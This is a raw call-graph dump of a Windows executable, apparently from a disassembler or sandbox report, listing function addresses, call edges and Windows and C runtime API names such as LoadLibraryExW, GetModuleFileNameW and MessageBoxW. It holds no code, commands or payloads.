15784->15785 16167 7ff76d5c3080 15785->16167 15788 7ff76d5c38ea 15789 7ff76d5c3947 15788->15789 15791 7ff76d5c3901 15788->15791 16112 7ff76d5c65a0 15788->16112 15789->15782 15797 7ff76d5c395c 15789->15797 15805 7ff76d5c3905 15791->15805 16133 7ff76d5c6970 15791->16133 16043 7ff76d5c30e0 15797->16043 15799 7ff76d5c6780 FreeLibrary 15801 7ff76d5c3aa3 15799->15801 15805->15789 16149 7ff76d5c2870 15805->16149 16074 7ff76d5cb870 15820->16074 15830 7ff76d5d8e7c 15829->15830 15831 7ff76d5d8e5b 15829->15831 18286 7ff76d5d96e8 15830->18286 15831->15706 15834 7ff76d5cc5d8 GetModuleHandleW 15835 7ff76d5cc5e9 15834->15835 15835->15715 15837 7ff76d5cc2c1 15836->15837 15838 7ff76d5cc080 15837->15838 15839 7ff76d5ccba8 7 API calls 15837->15839 15838->15704 15839->15838 15841 7ff76d5cc472 _isindst memcpy_s 15840->15841 15842 7ff76d5cc491 RtlCaptureContext RtlLookupFunctionEntry 15841->15842 15843 7ff76d5cc4f6 memcpy_s 15842->15843 15844 7ff76d5cc4ba RtlVirtualUnwind 15842->15844 15845 7ff76d5cc528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15843->15845 15844->15843 15846 7ff76d5cc576 _isindst 15845->15846 15846->15702 15848 7ff76d5ccbb0 15847->15848 15849 7ff76d5ccbba 15847->15849 15853 7ff76d5ccf44 15848->15853 15849->15720 15854 7ff76d5ccf53 15853->15854 15855 7ff76d5ccbb5 15853->15855 15861 7ff76d5cd180 15854->15861 15857 7ff76d5ccfb0 15855->15857 15858 7ff76d5ccfdb 15857->15858 15859 7ff76d5ccfdf 15858->15859 15860 7ff76d5ccfbe DeleteCriticalSection 15858->15860 15859->15849 15860->15858 15865 7ff76d5ccfe8 15861->15865 15866 7ff76d5cd0d2 TlsFree 15865->15866 15872 7ff76d5cd02c __vcrt_FlsAlloc 15865->15872 15867 7ff76d5cd05a LoadLibraryExW 15869 7ff76d5cd07b GetLastError 15867->15869 15870 7ff76d5cd0f9 15867->15870 15868 7ff76d5cd119 GetProcAddress 15868->15866 15869->15872 15870->15868 15871 7ff76d5cd110 FreeLibrary 15870->15871 15871->15868 15872->15866 15872->15867 15872->15868 15873 7ff76d5cd09d LoadLibraryExW 15872->15873 15873->15870 15873->15872 15875 7ff76d5cc5ab GetStartupInfoW 15874->15875 15875->15708 15879 7ff76d5de790 15876->15879 15877 7ff76d5de7e3 16180 7ff76d5d9b24 15877->16180 15879->15877 15880 7ff76d5de836 15879->15880 16190 7ff76d5de668 15880->16190 15882 7ff76d5de80c 15882->15729 16236 7ff76d5cbb70 15883->16236 15886 7ff76d5c3438 16238 7ff76d5c85a0 FindFirstFileExW 15886->16238 15887 7ff76d5c341b 16243 7ff76d5c29e0 15887->16243 15890 7ff76d5c342e 15895 7ff76d5cb870 _log10_special 8 API calls 15890->15895 15892 7ff76d5c34a5 16262 7ff76d5c8760 15892->16262 15893 7ff76d5c344b 16253 7ff76d5c8620 CreateFileW 15893->16253 15898 7ff76d5c34dd 15895->15898 15897 7ff76d5c34b3 15897->15890 15901 7ff76d5c26c0 49 API calls 15897->15901 15898->15820 15905 7ff76d5c18f0 15898->15905 15900 7ff76d5c345c 16256 7ff76d5c26c0 15900->16256 15901->15890 15904 7ff76d5c3474 __vcrt_FlsAlloc 15904->15892 15906 7ff76d5c3f70 108 API calls 15905->15906 15907 7ff76d5c1925 15906->15907 15908 7ff76d5c1bb6 15907->15908 15909 7ff76d5c76a0 83 API calls 15907->15909 15910 7ff76d5cb870 _log10_special 8 API calls 15908->15910 15911 7ff76d5c196b 15909->15911 15912 7ff76d5c1bd1 15910->15912 15944 7ff76d5c199c 15911->15944 16660 7ff76d5cf9f4 15911->16660 15912->15735 15912->15736 15914 7ff76d5cf36c 74 API calls 15914->15908 15915 7ff76d5c1985 15916 7ff76d5c19a1 15915->15916 15917 7ff76d5c1989 15915->15917 16664 7ff76d5cf6bc 15916->16664 16667 7ff76d5c2760 15917->16667 15921 7ff76d5c19bf 15923 7ff76d5c2760 53 API calls 15921->15923 15922 7ff76d5c19d7 15924 7ff76d5c1a06 15922->15924 15925 7ff76d5c19ee 15922->15925 15923->15944 15927 7ff76d5c1bf0 49 API calls 15924->15927 15926 7ff76d5c2760 53 API calls 15925->15926 15926->15944 15928 7ff76d5c1a1d 15927->15928 15929 7ff76d5c1bf0 49 API calls 15928->15929 15930 7ff76d5c1a68 15929->15930 15931 7ff76d5cf9f4 73 API calls 15930->15931 15932 7ff76d5c1a8c 15931->15932 15933 7ff76d5c1aa1 15932->15933 15934 7ff76d5c1ab9 15932->15934 15936 7ff76d5c2760 53 API calls 15933->15936 15935 7ff76d5cf6bc _fread_nolock 53 API calls 15934->15935 15937 7ff76d5c1ace 15935->15937 15936->15944 15938 7ff76d5c1ad4 15937->15938 15939 7ff76d5c1aec 15937->15939 15940 7ff76d5c2760 53 API calls 15938->15940 16684 7ff76d5cf430 15939->16684 15940->15944 15943 7ff76d5c25f0 53 API calls 15943->15944 15944->15914 15946 7ff76d5c7e1a 15945->15946 15947 7ff76d5c86b0 2 API calls 15946->15947 15948 7ff76d5c7e39 GetEnvironmentVariableW 15947->15948 15949 7ff76d5c7ea2 15948->15949 15950 7ff76d5c7e56 ExpandEnvironmentStringsW 15948->15950 15952 7ff76d5cb870 _log10_special 8 API calls 15949->15952 15950->15949 15951 7ff76d5c7e78 15950->15951 15953 7ff76d5c8760 2 API calls 15951->15953 15954 7ff76d5c7eb4 15952->15954 15955 7ff76d5c7e8a 15953->15955 15954->15746 15956 7ff76d5cb870 _log10_special 8 API calls 15955->15956 15957 7ff76d5c7e9a 15956->15957 15957->15746 15959 7ff76d5c86b0 2 API calls 15958->15959 15960 7ff76d5c7f94 15959->15960 16893 7ff76d5d7548 15960->16893 15962 7ff76d5c7fa6 __vcrt_freefls 15962->15761 15964 7ff76d5c1c15 15963->15964 15965 7ff76d5d3ca4 49 API calls 15964->15965 15966 7ff76d5c1c38 15965->15966 15966->15777 15966->15778 15968 7ff76d5c8415 15967->15968 16911 7ff76d5c7b50 GetCurrentProcess OpenProcessToken 15968->16911 15971 7ff76d5c7b50 7 API calls 15972 7ff76d5c8441 15971->15972 15973 7ff76d5c8474 15972->15973 15974 7ff76d5c845a 15972->15974 15976 7ff76d5c2590 48 API calls 15973->15976 15975 7ff76d5c2590 48 API calls 15974->15975 15977 7ff76d5c8472 15975->15977 15978 7ff76d5c8487 LocalFree LocalFree 15976->15978 15977->15978 15979 7ff76d5c84a3 15978->15979 15981 7ff76d5c84af 15978->15981 16921 7ff76d5c2940 15979->16921 15982 7ff76d5cb870 _log10_special 8 API calls 15981->15982 16019 7ff76d5c86d2 MultiByteToWideChar 16018->16019 16020 7ff76d5c86f6 16018->16020 16019->16020 16022 7ff76d5c870c __vcrt_freefls 16019->16022 16021 7ff76d5c8713 MultiByteToWideChar 16020->16021 16020->16022 16021->16022 16022->15773 16025 7ff76d5c6575 16023->16025 16024 7ff76d5c38d5 16027 7ff76d5c6b00 16024->16027 16025->16024 16026 7ff76d5c2760 53 API calls 16025->16026 16026->16024 16028 7ff76d5c6b30 16027->16028 16029 7ff76d5c6b4a __vcrt_freefls 16027->16029 16028->16029 17205 7ff76d5c1440 16028->17205 16029->15788 16031 7ff76d5c6b54 16031->16029 16032 7ff76d5c3fe0 49 API calls 16031->16032 16033 7ff76d5c6b76 16032->16033 16034 7ff76d5c6b7b 16033->16034 16035 7ff76d5c3fe0 49 API calls 16033->16035 16036 7ff76d5c2870 53 API calls 16034->16036 16037 7ff76d5c6b9a 16035->16037 16036->16029 16037->16034 16038 7ff76d5c3fe0 49 API calls 16037->16038 16039 7ff76d5c6bb6 16038->16039 16039->16034 16040 7ff76d5c6bbf 16039->16040 16044 7ff76d5c30ee memcpy_s 16043->16044 16048 7ff76d5c32e7 16044->16048 16049 7ff76d5c1bf0 49 API calls 16044->16049 16050 7ff76d5c3309 16044->16050 16055 7ff76d5c32e9 16044->16055 16057 7ff76d5c2870 53 API calls 16044->16057 16060 7ff76d5c32f7 16044->16060 17266 7ff76d5c3f10 16044->17266 17272 7ff76d5c7530 16044->17272 17284 7ff76d5c15c0 16044->17284 17322 7ff76d5c68e0 16044->17322 17326 7ff76d5c3b40 16044->17326 17370 7ff76d5c3e00 16044->17370 16045 7ff76d5cb870 _log10_special 8 API calls 16046 7ff76d5c338e 16045->16046 16046->15820 16062 7ff76d5c83e0 LocalFree 16046->16062 16048->16045 16049->16044 16052 7ff76d5c25f0 53 API calls 16050->16052 16052->16048 16056 7ff76d5c25f0 53 API calls 16055->16056 16056->16048 16057->16044 16061 7ff76d5c25f0 53 API calls 16060->16061 16061->16048 16064 7ff76d5c262a 16063->16064 16065 7ff76d5d3ca4 49 API calls 16064->16065 16066 7ff76d5c2652 16065->16066 16067 7ff76d5c86b0 2 API calls 16066->16067 16068 7ff76d5c266a 16067->16068 16069 7ff76d5c2677 MessageBoxW 16068->16069 16070 7ff76d5c268e MessageBoxA 16068->16070 16071 7ff76d5c26a0 16069->16071 16070->16071 16076 7ff76d5cb879 16074->16076 16075 7ff76d5c372a 16075->15834 16076->16075 16077 7ff76d5cbc00 IsProcessorFeaturePresent 16076->16077 16078 7ff76d5cbc18 16077->16078 17506 7ff76d5cbdf8 RtlCaptureContext 16078->17506 16084 7ff76d5c3f7c 16083->16084 16085 7ff76d5c86b0 2 API calls 16084->16085 16086 7ff76d5c3fa4 16085->16086 16087 7ff76d5c86b0 2 API calls 16086->16087 16088 7ff76d5c3fb7 16087->16088 17511 7ff76d5d52a4 16088->17511 16091 7ff76d5cb870 _log10_special 8 API calls 16092 7ff76d5c3746 16091->16092 16092->15741 16093 7ff76d5c76a0 16092->16093 16094 7ff76d5c76c4 16093->16094 16095 7ff76d5c779b __vcrt_freefls 16094->16095 16096 7ff76d5cf9f4 73 API calls 16094->16096 16095->15745 16097 7ff76d5c76e0 16096->16097 16097->16095 17902 7ff76d5d6bd8 16097->17902 16099 7ff76d5cf9f4 73 API calls 16101 7ff76d5c76f5 16099->16101 16100 7ff76d5cf6bc _fread_nolock 53 API calls 16100->16101 16101->16095 16101->16099 16101->16100 16103 7ff76d5cf39c 16102->16103 17917 7ff76d5cf148 16103->17917 16105 7ff76d5cf3b5 16105->15741 16107 7ff76d5c1bf0 49 API calls 16106->16107 16108 7ff76d5c3ead 16107->16108 16108->15755 16110 7ff76d5c1bf0 49 API calls 16109->16110 16111 7ff76d5c4010 16110->16111 16111->15777 16130 7ff76d5c65bc 16112->16130 16113 7ff76d5c66df 16114 7ff76d5cb870 _log10_special 8 API calls 16113->16114 16115 7ff76d5c66f1 16114->16115 16115->15791 16116 7ff76d5c17e0 45 API calls 16116->16130 16117 7ff76d5c675d 16119 7ff76d5c25f0 53 API calls 16117->16119 16118 7ff76d5c1bf0 49 API calls 16118->16130 16119->16113 16120 7ff76d5c674a 16122 7ff76d5c25f0 53 API calls 16120->16122 16121 7ff76d5c3f10 10 API calls 16121->16130 16122->16113 16123 7ff76d5c670d 16125 7ff76d5c25f0 53 API calls 16123->16125 16124 7ff76d5c7530 52 API calls 16124->16130 16125->16113 16126 7ff76d5c2870 53 API calls 16126->16130 16127 7ff76d5c6737 16128 7ff76d5c25f0 53 API calls 16127->16128 16128->16113 16129 7ff76d5c15c0 118 API calls 16129->16130 16130->16113 16130->16116 16130->16117 16130->16118 16130->16120 16130->16121 16130->16123 16130->16124 16130->16126 16130->16127 16130->16129 16131 7ff76d5c6720 16130->16131 16132 7ff76d5c25f0 53 API calls 16131->16132 16132->16113 17928 7ff76d5c81a0 16133->17928 16135 7ff76d5c6989 16136 7ff76d5c81a0 3 API calls 16135->16136 16137 7ff76d5c699c 16136->16137 16138 7ff76d5c69cf 16137->16138 16140 7ff76d5c69b4 16137->16140 16139 7ff76d5c25f0 53 API calls 16138->16139 16142 7ff76d5c3916 16139->16142 17932 7ff76d5c6ea0 GetProcAddress 16140->17932 16142->15805 16143 7ff76d5c6cd0 16142->16143 16144 7ff76d5c6ced 16143->16144 16150 7ff76d5c28aa 16149->16150 16151 7ff76d5d3ca4 49 API calls 16150->16151 16152 7ff76d5c28d2 16151->16152 16153 7ff76d5c86b0 2 API calls 16152->16153 16154 7ff76d5c28ea 16153->16154 16155 7ff76d5c28f7 MessageBoxW 16154->16155 16156 7ff76d5c290e MessageBoxA 16154->16156 16157 7ff76d5c2920 16155->16157 16156->16157 16158 7ff76d5cb870 _log10_special 8 API calls 16157->16158 16159 7ff76d5c2930 16158->16159 16160 7ff76d5c6780 16159->16160 17997 7ff76d5c5af0 16167->17997 16175 7ff76d5c30b9 16176 7ff76d5c33a0 16175->16176 16177 7ff76d5c33ae 16176->16177 16178 7ff76d5c33bf 16177->16178 18285 7ff76d5c8180 FreeLibrary 16177->18285 16178->15799 16197 7ff76d5d986c 16180->16197 16184 7ff76d5d9b5f 16184->15882 16235 7ff76d5d477c EnterCriticalSection 16190->16235 16198 7ff76d5d98c3 16197->16198 16199 7ff76d5d9888 GetLastError 16197->16199 16198->16184 16203 7ff76d5d98d8 16198->16203 16200 7ff76d5d9898 16199->16200 16210 7ff76d5da6a0 16200->16210 16204 7ff76d5d98f4 GetLastError SetLastError 16203->16204 16205 7ff76d5d990c 16203->16205 16204->16205 16205->16184 16206 7ff76d5d9c10 IsProcessorFeaturePresent 16205->16206 16207 7ff76d5d9c23 16206->16207 16227 7ff76d5d9924 16207->16227 16211 7ff76d5da6bf FlsGetValue 16210->16211 16212 7ff76d5da6da FlsSetValue 16210->16212 16213 7ff76d5da6d4 16211->16213 16215 7ff76d5d98b3 SetLastError 16211->16215 16214 7ff76d5da6e7 16212->16214 16212->16215 16213->16212 16216 7ff76d5ddea8 memcpy_s 11 API calls 16214->16216 16215->16198 16217 7ff76d5da6f6 16216->16217 16218 7ff76d5da714 FlsSetValue 16217->16218 16219 7ff76d5da704 FlsSetValue 16217->16219 16221 7ff76d5da720 FlsSetValue 16218->16221 16222 7ff76d5da732 16218->16222 16220 7ff76d5da70d 16219->16220 16223 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16220->16223 16221->16220 16224 7ff76d5da204 memcpy_s 11 API calls 16222->16224 16223->16215 16225 7ff76d5da73a 16224->16225 16226 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16225->16226 16226->16215 16228 7ff76d5d995e _isindst memcpy_s 16227->16228 16229 7ff76d5d9986 RtlCaptureContext RtlLookupFunctionEntry 16228->16229 16230 7ff76d5d99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16229->16230 16231 7ff76d5d99c0 RtlVirtualUnwind 16229->16231 16233 7ff76d5d9a48 _isindst 16230->16233 16231->16230 16232 7ff76d5cb870 _log10_special 8 API calls 16234 7ff76d5d9a67 GetCurrentProcess TerminateProcess 16232->16234 16233->16232 16237 7ff76d5c33ec GetModuleFileNameW 16236->16237 16237->15886 16237->15887 16239 7ff76d5c85df FindClose 16238->16239 16240 7ff76d5c85f2 16238->16240 16239->16240 16241 7ff76d5cb870 _log10_special 8 API calls 16240->16241 16242 7ff76d5c3442 16241->16242 16242->15892 16242->15893 16244 7ff76d5cbb70 16243->16244 16245 7ff76d5c29fc GetLastError 16244->16245 16246 7ff76d5c2a29 16245->16246 16267 7ff76d5d3ef8 16246->16267 16251 7ff76d5cb870 _log10_special 8 API calls 16252 7ff76d5c2ae5 16251->16252 16252->15890 16254 7ff76d5c8660 GetFinalPathNameByHandleW CloseHandle 16253->16254 16255 7ff76d5c3458 16253->16255 16254->16255 16255->15900 16255->15904 16257 7ff76d5c26fa 16256->16257 16258 7ff76d5d3ef8 48 API calls 16257->16258 16259 7ff76d5c2722 MessageBoxW 16258->16259 16260 7ff76d5cb870 _log10_special 8 API calls 16259->16260 16261 7ff76d5c274c 16260->16261 16261->15890 16263 7ff76d5c87b5 16262->16263 16264 7ff76d5c878a WideCharToMultiByte 16262->16264 16265 7ff76d5c87d2 WideCharToMultiByte 16263->16265 16266 7ff76d5c87cb __vcrt_freefls 16263->16266 16264->16263 16264->16266 16265->16266 16266->15897 16269 7ff76d5d3f52 16267->16269 16268 7ff76d5d3f77 16270 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16268->16270 16269->16268 16271 7ff76d5d3fb3 16269->16271 16273 7ff76d5d3fa1 16270->16273 16289 7ff76d5d22b0 16271->16289 16275 7ff76d5cb870 _log10_special 8 API calls 16273->16275 16274 7ff76d5d4094 16276 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16274->16276 16278 7ff76d5c2a54 FormatMessageW 16275->16278 16276->16273 16285 7ff76d5c2590 16278->16285 16279 7ff76d5d4069 16282 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16279->16282 16280 7ff76d5d40ba 16280->16274 16281 7ff76d5d40c4 16280->16281 16284 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16281->16284 16282->16273 16283 7ff76d5d4060 16283->16274 16283->16279 16284->16273 16286 7ff76d5c25b5 16285->16286 16287 7ff76d5d3ef8 48 API calls 16286->16287 16288 7ff76d5c25d8 MessageBoxW 16287->16288 16288->16251 16290 7ff76d5d22ee 16289->16290 16295 7ff76d5d22de 16289->16295 16291 7ff76d5d22f7 16290->16291 16296 7ff76d5d2325 16290->16296 16293 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16291->16293 16292 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16294 7ff76d5d231d 16292->16294 16293->16294 16294->16274 16294->16279 16294->16280 16294->16283 16295->16292 16296->16294 16296->16295 16300 7ff76d5d2cc4 16296->16300 16333 7ff76d5d2710 16296->16333 16370 7ff76d5d1ea0 16296->16370 16301 7ff76d5d2d06 16300->16301 16302 7ff76d5d2d77 16300->16302 16305 7ff76d5d2da1 16301->16305 16306 7ff76d5d2d0c 16301->16306 16303 7ff76d5d2dd0 16302->16303 16304 7ff76d5d2d7c 16302->16304 16311 7ff76d5d2de7 16303->16311 16313 7ff76d5d2dda 16303->16313 16318 7ff76d5d2ddf 16303->16318 16307 7ff76d5d2db1 16304->16307 16308 7ff76d5d2d7e 16304->16308 16393 7ff76d5d1074 16305->16393 16309 7ff76d5d2d40 16306->16309 16310 7ff76d5d2d11 16306->16310 16400 7ff76d5d0c64 16307->16400 16312 7ff76d5d2d20 16308->16312 16322 7ff76d5d2d8d 16308->16322 16314 7ff76d5d2d17 16309->16314 16309->16318 16310->16311 16310->16314 16407 7ff76d5d39cc 16311->16407 16331 7ff76d5d2e10 16312->16331 16373 7ff76d5d3478 16312->16373 16313->16305 16313->16318 16314->16312 16321 7ff76d5d2d52 16314->16321 16329 7ff76d5d2d3b 16314->16329 16318->16331 16411 7ff76d5d1484 16318->16411 16321->16331 16383 7ff76d5d37b4 16321->16383 16322->16305 16323 7ff76d5d2d92 16322->16323 16323->16331 16389 7ff76d5d3878 16323->16389 16325 7ff76d5cb870 _log10_special 8 API calls 16326 7ff76d5d310a 16325->16326 16326->16296 16329->16331 16332 7ff76d5d2ffc 16329->16332 16418 7ff76d5d3ae0 16329->16418 16331->16325 16332->16331 16424 7ff76d5ddd18 16332->16424 16334 7ff76d5d2734 16333->16334 16335 7ff76d5d271e 16333->16335 16336 7ff76d5d2774 16334->16336 16337 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16334->16337 16335->16336 16338 7ff76d5d2d06 16335->16338 16339 7ff76d5d2d77 16335->16339 16336->16296 16337->16336 16342 7ff76d5d2da1 16338->16342 16343 7ff76d5d2d0c 16338->16343 16340 7ff76d5d2dd0 16339->16340 16341 7ff76d5d2d7c 16339->16341 16348 7ff76d5d2de7 16340->16348 16350 7ff76d5d2dda 16340->16350 16355 7ff76d5d2ddf 16340->16355 16344 7ff76d5d2db1 16341->16344 16345 7ff76d5d2d7e 16341->16345 16352 7ff76d5d1074 38 API calls 16342->16352 16346 7ff76d5d2d40 16343->16346 16347 7ff76d5d2d11 16343->16347 16353 7ff76d5d0c64 38 API calls 16344->16353 16349 7ff76d5d2d20 16345->16349 16359 7ff76d5d2d8d 16345->16359 16351 7ff76d5d2d17 16346->16351 16346->16355 16347->16348 16347->16351 16356 7ff76d5d39cc 45 API calls 16348->16356 16354 7ff76d5d3478 47 API calls 16349->16354 16369 7ff76d5d2e10 16349->16369 16350->16342 16350->16355 16351->16349 16357 7ff76d5d2d52 16351->16357 16366 7ff76d5d2d3b 16351->16366 16352->16366 16353->16366 16354->16366 16358 7ff76d5d1484 38 API calls 16355->16358 16355->16369 16356->16366 16360 7ff76d5d37b4 46 API calls 16357->16360 16357->16369 16358->16366 16359->16342 16361 7ff76d5d2d92 16359->16361 16360->16366 16364 7ff76d5d3878 37 API calls 16361->16364 16361->16369 16362 7ff76d5cb870 _log10_special 8 API calls 16363 7ff76d5d310a 16362->16363 16363->16296 16364->16366 16365 7ff76d5d3ae0 45 API calls 16368 7ff76d5d2ffc 16365->16368 16366->16365 16366->16368 16366->16369 16367 7ff76d5ddd18 46 API calls 16367->16368 16368->16367 16368->16369 16369->16362 16643 7ff76d5d02e8 16370->16643 16374 7ff76d5d349e 16373->16374 16436 7ff76d5cfea0 16374->16436 16379 7ff76d5d35e3 16381 7ff76d5d3ae0 45 API calls 16379->16381 16382 7ff76d5d3671 16379->16382 16380 7ff76d5d3ae0 45 API calls 16380->16379 16381->16382 16382->16329 16384 7ff76d5d37e9 16383->16384 16385 7ff76d5d382e 16384->16385 16386 7ff76d5d3807 16384->16386 16387 7ff76d5d3ae0 45 API calls 16384->16387 16385->16329 16388 7ff76d5ddd18 46 API calls 16386->16388 16387->16386 16388->16385 16391 7ff76d5d3899 16389->16391 16390 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16392 7ff76d5d38ca 16390->16392 16391->16390 16391->16392 16392->16329 16394 7ff76d5d10a7 16393->16394 16395 7ff76d5d10d6 16394->16395 16397 7ff76d5d1193 16394->16397 16399 7ff76d5d1113 16395->16399 16575 7ff76d5cff48 16395->16575 16398 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16397->16398 16398->16399 16399->16329 16401 7ff76d5d0c97 16400->16401 16402 7ff76d5d0cc6 16401->16402 16404 7ff76d5d0d83 16401->16404 16403 7ff76d5cff48 12 API calls 16402->16403 16406 7ff76d5d0d03 16402->16406 16403->16406 16405 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16404->16405 16405->16406 16406->16329 16408 7ff76d5d3a0f 16407->16408 16410 7ff76d5d3a13 __crtLCMapStringW 16408->16410 16583 7ff76d5d3a68 16408->16583 16410->16329 16412 7ff76d5d14b7 16411->16412 16413 7ff76d5d14e6 16412->16413 16415 7ff76d5d15a3 16412->16415 16414 7ff76d5cff48 12 API calls 16413->16414 16417 7ff76d5d1523 16413->16417 16414->16417 16416 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16415->16416 16416->16417 16417->16329 16419 7ff76d5d3af7 16418->16419 16587 7ff76d5dccc8 16419->16587 16425 7ff76d5ddd49 16424->16425 16434 7ff76d5ddd57 16424->16434 16426 7ff76d5ddd77 16425->16426 16429 7ff76d5d3ae0 45 API calls 16425->16429 16425->16434 16427 7ff76d5dddaf 16426->16427 16428 7ff76d5ddd88 16426->16428 16431 7ff76d5dde3a 16427->16431 16432 7ff76d5dddd9 16427->16432 16427->16434 16633 7ff76d5df3b0 16428->16633 16429->16426 16433 7ff76d5debb0 _fread_nolock MultiByteToWideChar 16431->16433 16432->16434 16636 7ff76d5debb0 16432->16636 16433->16434 16434->16332 16437 7ff76d5cfed7 16436->16437 16438 7ff76d5cfec6 16436->16438 16437->16438 16439 7ff76d5dc90c _fread_nolock 12 API calls 16437->16439 16444 7ff76d5dd880 16438->16444 16440 7ff76d5cff04 16439->16440 16441 7ff76d5cff18 16440->16441 16442 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16440->16442 16443 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16441->16443 16442->16441 16443->16438 16445 7ff76d5dd8d0 16444->16445 16446 7ff76d5dd89d 16444->16446 16445->16446 16448 7ff76d5dd902 16445->16448 16447 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16446->16447 16456 7ff76d5d35c1 16447->16456 16453 7ff76d5dda15 16448->16453 16461 7ff76d5dd94a 16448->16461 16449 7ff76d5ddb07 16499 7ff76d5dcd6c 16449->16499 16451 7ff76d5ddacd 16492 7ff76d5dd104 16451->16492 16452 7ff76d5dda9c 16485 7ff76d5dd3e4 16452->16485 16453->16449 16453->16451 16453->16452 16455 7ff76d5dda5f 16453->16455 16458 7ff76d5dda55 16453->16458 16475 7ff76d5dd614 16455->16475 16456->16379 16456->16380 16458->16451 16460 7ff76d5dda5a 16458->16460 16460->16452 16460->16455 16461->16456 16466 7ff76d5d97b4 16461->16466 16464 7ff76d5d9c10 _isindst 17 API calls 16465 7ff76d5ddb64 16464->16465 16467 7ff76d5d97c1 16466->16467 16468 7ff76d5d97cb 16466->16468 16467->16468 16473 7ff76d5d97e6 16467->16473 16469 7ff76d5d43f4 memcpy_s 11 API calls 16468->16469 16470 7ff76d5d97d2 16469->16470 16508 7ff76d5d9bf0 16470->16508 16472 7ff76d5d97de 16472->16456 16472->16464 16473->16472 16474 7ff76d5d43f4 memcpy_s 11 API calls 16473->16474 16474->16470 16511 7ff76d5e33bc 16475->16511 16479 7ff76d5dd6bc 16480 7ff76d5dd711 16479->16480 16481 7ff76d5dd6dc 16479->16481 16484 7ff76d5dd6c0 16479->16484 16564 7ff76d5dd200 16480->16564 16560 7ff76d5dd4bc 16481->16560 16484->16456 16486 7ff76d5e33bc 38 API calls 16485->16486 16487 7ff76d5dd42e 16486->16487 16488 7ff76d5e2e04 37 API calls 16487->16488 16490 7ff76d5dd47e 16488->16490 16489 7ff76d5dd482 16489->16456 16490->16489 16491 7ff76d5dd4bc 45 API calls 16490->16491 16491->16489 16493 7ff76d5e33bc 38 API calls 16492->16493 16494 7ff76d5dd14f 16493->16494 16495 7ff76d5e2e04 37 API calls 16494->16495 16496 7ff76d5dd1a7 16495->16496 16497 7ff76d5dd1ab 16496->16497 16498 7ff76d5dd200 45 API calls 16496->16498 16497->16456 16498->16497 16500 7ff76d5dcde4 16499->16500 16501 7ff76d5dcdb1 16499->16501 16503 7ff76d5dcdfc 16500->16503 16505 7ff76d5dce7d 16500->16505 16502 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16501->16502 16507 7ff76d5dcddd memcpy_s 16502->16507 16504 7ff76d5dd104 46 API calls 16503->16504 16504->16507 16506 7ff76d5d3ae0 45 API calls 16505->16506 16505->16507 16506->16507 16507->16456 16509 7ff76d5d9a88 _invalid_parameter_noinfo 37 API calls 16508->16509 16510 7ff76d5d9c09 16509->16510 16510->16472 16512 7ff76d5e340f fegetenv 16511->16512 16513 7ff76d5e713c 37 API calls 16512->16513 16516 7ff76d5e3462 16513->16516 16514 7ff76d5e348f 16519 7ff76d5d97b4 __std_exception_copy 37 API calls 16514->16519 16515 7ff76d5e3552 16517 7ff76d5e713c 37 API calls 16515->16517 16516->16515 16520 7ff76d5e352c 16516->16520 16521 7ff76d5e347d 16516->16521 16518 7ff76d5e357c 16517->16518 16522 7ff76d5e713c 37 API calls 16518->16522 16523 7ff76d5e350d 16519->16523 16524 7ff76d5d97b4 __std_exception_copy 37 API calls 16520->16524 16521->16514 16521->16515 16525 7ff76d5e358d 16522->16525 16526 7ff76d5e4634 16523->16526 16530 7ff76d5e3515 16523->16530 16524->16523 16528 7ff76d5e7330 20 API calls 16525->16528 16527 7ff76d5d9c10 _isindst 17 API calls 16526->16527 16529 7ff76d5e4649 16527->16529 16540 7ff76d5e35f6 memcpy_s 16528->16540 16531 7ff76d5cb870 _log10_special 8 API calls 16530->16531 16532 7ff76d5dd661 16531->16532 16556 7ff76d5e2e04 16532->16556 16533 7ff76d5e3f7b memcpy_s 16535 7ff76d5e3cdf 16533->16535 16539 7ff76d5e3c8b 16533->16539 16549 7ff76d5d43f4 11 API calls memcpy_s 16533->16549 16552 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 16533->16552 16534 7ff76d5e399f memcpy_s 16537 7ff76d5e2f20 37 API calls 16535->16537 16536 7ff76d5e3637 memcpy_s 16536->16533 16550 7ff76d5e3a93 memcpy_s 16536->16550 16538 7ff76d5e43f7 16537->16538 16546 7ff76d5e464c memcpy_s 37 API calls 16538->16546 16555 7ff76d5e4452 16538->16555 16539->16535 16539->16539 16541 7ff76d5e464c memcpy_s 37 API calls 16539->16541 16540->16534 16540->16536 16542 7ff76d5d43f4 memcpy_s 11 API calls 16540->16542 16541->16535 16544 7ff76d5e3a70 16542->16544 16543 7ff76d5e45d8 16547 7ff76d5e713c 37 API calls 16543->16547 16545 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 16544->16545 16545->16536 16546->16555 16547->16530 16548 7ff76d5d43f4 11 API calls memcpy_s 16548->16550 16549->16533 16550->16539 16550->16548 16553 7ff76d5d9bf0 37 API calls _invalid_parameter_noinfo 16550->16553 16551 7ff76d5e2f20 37 API calls 16551->16555 16552->16533 16553->16550 16554 7ff76d5e464c memcpy_s 37 API calls 16554->16555 16555->16543 16555->16551 16555->16554 16557 7ff76d5e2e23 16556->16557 16558 7ff76d5d9b24 _invalid_parameter_noinfo 37 API calls 16557->16558 16559 7ff76d5e2e4e memcpy_s 16557->16559 16558->16559 16559->16479 16561 7ff76d5dd4e8 memcpy_s 16560->16561 16561->16561 16562 7ff76d5d3ae0 